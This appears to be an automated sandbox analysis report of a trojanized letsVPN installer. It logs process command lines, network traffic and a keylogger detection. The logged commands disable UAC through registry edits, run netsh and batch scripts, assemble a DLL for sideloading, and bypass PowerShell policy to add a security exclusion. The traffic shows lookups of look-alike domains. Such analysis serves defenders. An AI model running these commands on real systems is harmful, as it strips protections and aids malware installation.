                                                                                                                                                                                                  Server: nginx/1.16.0
                                                                                                                                                                                                  Date: Sun, 29 Dec 2024 15:15:32 GMT
                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Expires: Sun, 29 Dec 2024 15:15:32 GMT
                                                                                                                                                                                                  Cache-Control: private, max-age=3
                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                  Via: 1.1 c5be8caec2de3502cf9672040e52189a.cloudfront.net (CloudFront)
                                                                                                                                                                                                  X-Amz-Cf-Pop: BAH53-C1
                                                                                                                                                                                                  X-Amz-Cf-Id: iiNqGHiX0fNnrJ0bEDjMqU-PuNMaxxF3lOssp3YfslQVyOcMEEejdQ==
                                                                                                                                                                                                  2024-12-29 15:15:33 UTC660INData Raw: 32 38 64 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6e 61 6c 2e 66 71 6f 71 65 68 77 69 62 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6e 61 6c 2e 66 71 6f 71 65 68 77 69 62 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 33 2c 22 64 61 74 61 22 3a 22 36 2e 31 31 34 2e 31 33 2e 31 35 39 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 6e 61 6c 2e 66 71 6f 71 65 68 77 69 62 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 33 2c 22 64 61 74 61 22 3a 22
                                                                                                                                                                                                  Data Ascii: 28d{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"nal.fqoqehwib.com.","type":1}],"Answer":[{"name":"nal.fqoqehwib.com.","type":1,"TTL":3,"data":"6.114.13.159"},{"name":"nal.fqoqehwib.com.","type":1,"TTL":3,"data":"
                                                                                                                                                                                                  2024-12-29 15:15:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  1192.168.2.64987813.227.9.244434820C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2024-12-29 15:15:32 UTC183OUTGET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=chr.alipayassets.com.&type=1 HTTP/1.1
                                                                                                                                                                                                  Host: d1dmgcawtbm6l9.cloudfront.net
                                                                                                                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                  2024-12-29 15:15:33 UTC676INHTTP/1.1 200 OK
                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Server: nginx/1.16.0
                                                                                                                                                                                                  Date: Sun, 29 Dec 2024 15:15:33 GMT
                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Expires: Sun, 29 Dec 2024 15:15:33 GMT
                                                                                                                                                                                                  Cache-Control: private, max-age=5
                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                  Via: 1.1 1484e663ceddae5460cfdb19a3c7d448.cloudfront.net (CloudFront)
                                                                                                                                                                                                  X-Amz-Cf-Pop: BAH53-C1
                                                                                                                                                                                                  X-Amz-Cf-Id: c53v0Tw8HzjJ012m4h0a0NMvqWjBjc6MyHPOKSC7LHq2wArgzr0SaQ==
                                                                                                                                                                                                  2024-12-29 15:15:33 UTC465INData Raw: 31 63 61 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 63 68 72 2e 61 6c 69 70 61 79 61 73 73 65 74 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 63 68 72 2e 61 6c 69 70 61 79 61 73 73 65 74 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 35 2c 22 64 61 74 61 22 3a 22 31 32 39 2e 31 38 30 2e 32 31 37 2e 31 33 38 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 63 68 72 2e 61 6c 69 70 61 79 61 73 73 65 74 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c
                                                                                                                                                                                                  Data Ascii: 1ca{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"chr.alipayassets.com.","type":1}],"Answer":[{"name":"chr.alipayassets.com.","type":1,"TTL":5,"data":"129.180.217.138"},{"name":"chr.alipayassets.com.","type":1,"TTL
                                                                                                                                                                                                  2024-12-29 15:15:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  2192.168.2.64987713.227.9.244434820C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2024-12-29 15:15:32 UTC182OUTGET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nit.crash1ytics.com.&type=1 HTTP/1.1
                                                                                                                                                                                                  Host: d1dmgcawtbm6l9.cloudfront.net
                                                                                                                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                  2024-12-29 15:15:33 UTC676INHTTP/1.1 200 OK
                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Server: nginx/1.16.0
                                                                                                                                                                                                  Date: Sun, 29 Dec 2024 15:15:33 GMT
                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Expires: Sun, 29 Dec 2024 15:15:33 GMT
                                                                                                                                                                                                  Cache-Control: private, max-age=2
                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                  Via: 1.1 c5be8caec2de3502cf9672040e52189a.cloudfront.net (CloudFront)
                                                                                                                                                                                                  X-Amz-Cf-Pop: BAH53-C1
                                                                                                                                                                                                  X-Amz-Cf-Id: _43twzA0f2-TE79r8RnBEbwWyu9CqgbDGkaM7-6jfLAz3YZ4TdP9gQ==
                                                                                                                                                                                                  2024-12-29 15:15:33 UTC604INData Raw: 32 35 35 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6e 69 74 2e 63 72 61 73 68 31 79 74 69 63 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6e 69 74 2e 63 72 61 73 68 31 79 74 69 63 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 32 2c 22 64 61 74 61 22 3a 22 31 32 34 2e 31 31 39 2e 31 32 31 2e 31 37 34 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 6e 69 74 2e 63 72 61 73 68 31 79 74 69 63 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 32
                                                                                                                                                                                                  Data Ascii: 255{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"nit.crash1ytics.com.","type":1}],"Answer":[{"name":"nit.crash1ytics.com.","type":1,"TTL":2,"data":"124.119.121.174"},{"name":"nit.crash1ytics.com.","type":1,"TTL":2
                                                                                                                                                                                                  2024-12-29 15:15:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                  Start time:10:14:17
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\letsVPN.exe"
                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                  File size:33'128'448 bytes
                                                                                                                                                                                                  MD5 hash:EF0F5B020EA3238A98642CD7B56D84BB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ipconfig /all
                                                                                                                                                                                                  Imagebase:0x7ff61fb20000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:ipconfig /all
                                                                                                                                                                                                  Imagebase:0x7ff75d720000
                                                                                                                                                                                                  File size:35'840 bytes
                                                                                                                                                                                                  MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\netsh.exe" exec C:\ProgramData\s1qGS.xml
                                                                                                                                                                                                  Imagebase:0x7ff6adfd0000
                                                                                                                                                                                                  File size:96'768 bytes
                                                                                                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\06VAP.bat"
                                                                                                                                                                                                  Imagebase:0x7ff61fb20000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
                                                                                                                                                                                                  Imagebase:0x7ff78bf10000
                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
                                                                                                                                                                                                  Imagebase:0x7ff78bf10000
                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                  Start time:10:14:21
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
                                                                                                                                                                                                  Imagebase:0x7ff78bf10000
                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                  Start time:10:14:21
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                  Imagebase:0x7ff7403e0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                  Start time:10:14:23
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\Jm42a\Q4nO1~16\s+C:\ProgramData\Jm42a\Q4nO1~16\a C:\ProgramData\Jm42a\Q4nO1~16\base.dll
                                                                                                                                                                                                  Imagebase:0x7ff61fb20000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                  Start time:10:14:23
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                  Start time:10:14:25
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\mmc.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\mmc.exe -Embedding
                                                                                                                                                                                                  Imagebase:0x7ff7cf500000
                                                                                                                                                                                                  File size:1'953'280 bytes
                                                                                                                                                                                                  MD5 hash:58C9E5172C3708A6971CA0CBC80FE8B8
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                  Start time:10:14:25
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe"
                                                                                                                                                                                                  Imagebase:0x510000
                                                                                                                                                                                                  File size:258'328 bytes
                                                                                                                                                                                                  MD5 hash:68411B35F7B40B45AFC4A60A2681549D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                  Start time:10:14:26
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\mmc.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\mmc.exe -Embedding
                                                                                                                                                                                                  Imagebase:0x7ff7cf500000
                                                                                                                                                                                                  File size:1'953'280 bytes
                                                                                                                                                                                                  MD5 hash:58C9E5172C3708A6971CA0CBC80FE8B8
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                  Start time:10:14:27
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\ProgramData\letsvpn-latest.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:15'511'576 bytes
                                                                                                                                                                                                  MD5 hash:9F5F358AA1A85D222AD967F4538BC753
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                  Start time:10:14:27
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ipconfig /all
                                                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                  Start time:10:14:27
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                  Start time:10:14:27
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:ipconfig /all
                                                                                                                                                                                                  Imagebase:0xd40000
                                                                                                                                                                                                  File size:29'184 bytes
                                                                                                                                                                                                  MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                  Start time:10:15:01
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
                                                                                                                                                                                                  Imagebase:0xf60000
                                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                  Start time:10:15:01
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                  Start time:10:15:05
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
                                                                                                                                                                                                  Imagebase:0x7ff796190000
